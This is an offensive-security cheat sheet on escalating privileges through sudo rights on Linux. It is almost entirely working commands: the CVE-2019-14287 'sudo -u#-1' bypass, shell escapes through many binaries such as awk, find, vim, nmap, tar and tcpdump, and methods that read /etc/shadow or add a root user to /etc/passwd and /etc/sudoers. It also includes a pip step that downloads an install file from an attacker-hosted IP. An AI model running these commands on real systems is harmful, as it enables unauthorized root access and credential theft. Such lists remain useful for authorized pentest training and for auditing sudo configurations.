Abusing Sudo Rights
Resources
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
https://gtfobins.github.io/CVE 2019-14287
# Exploitable when a user have the following permissions (sudo -l)
(ALL, !root) ALL
# If you have a full TTY, you can exploit it like this
sudo -u#-1 /bin/bash
# If no TTY, you can restart SSH server and add your key
sudo /etc/init.d/ssh restart
echo 'ssh-rsa AAAA[...snip...]fd48as= root@kali-jms' > authorized_keys
sudo -u#-1 bashExploiting sudo
apache2
sudo apache2 -f /etc/shadow
# You will get an error and it will # display first line
apt-get
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
awk
sudo awk ‘BEGIN {system(“/bin/sh”)}’
ed
sudo /usr/bin/ed !/bin/sh
find
sudo find /etc/passwd -exec /bin/sh \; sudo find /bin -name nano -exec /bin/sh \;
ftp
sudo ftp ftp> /!/bin/bash
gdb
sudo -u user gdb -q (gdb) shell
git
# Method 1 sudo -u user git -c core.pager=/tmp/script.sh –paginate help # Method 2 sudo git help add !/bin/bash
# Method 1 Create script.sh and chmod 777 → /bin/bash >&2 0>&2 # Method 2 You can also use the help add feature
ht
export TERM=xterm-color sudo ht /etc/sudoers # F3 to open the file, then update lines ALL=(ALL) NOPASSWD: ALL
less
sudo less /etc/hosts !sh
man
sudo man man !sh
more
sudo more /etc/hosts !sh
mount
sudo mount -o bind /bin/bash /bin/mount sudo mount
mysql
sudo mysql -e ‘!/bin/sh’
nano
sudo nano /etc/passwd
# You can then add a new root user openssl passwd -1 -salt user3 pass123 # /etc/passwd user3::0:0:root:/root:/bin/bash
nmap
# Method 1 sudo nmap –interactive nmap> !sh # Method 2 echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse
# Method 1 # Using –interactive option # Method 2 # Using –script option
pico
sudo -u user pico
# Type bash in editor an press ^T to # trigger spellchecker
pip
python -m SimpleHTTPServer 80 wget http://192.168.1.134/setup.py sudo pip install . –upgrade –force-reinstall
# You can use FakePip https://github.com/0x00-0x00/FakePip.git # Decode and change IP adress
rbash
echo $SHELL echo $PATH export SHELL=/bin/bash:$SHELL export PATH=/usr/bin:$PATH vi :!/bin/bash
rvim
rvim version
grep python echo “import os;os.system(‘bash’)” > /tmp/script.py sudo -u rvim -c “pyfile /tmp/script.py”
scp
sudo -u user scp -vv -C -S tmp/script.sh a whatever
# Create script.sh and chmod 777 → /bin/bash >&2 0>&2
script
sudo -u user script /tmp/what-ever
ssh
sudo -u user ssh -o ProxyCommand=/tmp/script.sh lel
# Create script.sh and chmod 777 → /bin/bash >&2 0>&2
strace / sysud64
sudo strace -o/dev/null /bin/bash sudo sysud64 -o/dev/null /bin/bash
tar
# Method 1 sudo -u user tar –checkpoint=1 –checkpoint-action=exec=/bin/bash -cf /tmp/12345.tar /dev/zero # Method 2 cd /tmpcp /bin/bash . sudo chown root:root /tmp/bash sudo mv /bin/tar /bin/tar.bak sudo mv /tmp/bash /bin/tar sudo /bin/tar
tcpdump
echo $’id\ncat /etc/shadow’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
teehee
echo “raaj::0:0:::/bin/bash”
sudo teehee -a /etc/passwd
vim
sudo vim -c ‘!sh’
wget
sudo wget http://ip/filePasswd -O /etc/passwd su user1
# Attacker side # Copy target’s file /etc/passwd # Add a new user and host the fil
zip
# Method 1 touch /tmp/xyz; chmod 444 /tmp/xyz sudo -u user zip /tmp/zzz.zip /tmp/xyz -T -TT /tmp/script.sh # Method 2 touch raj sudo zip /tmp/nisha.zip /home/zico/raj -T –unzip-command=“sh -c /bin/bash”
# Create script.sh and chmod 777 → /bin/bash >&2 0>&2
Last updated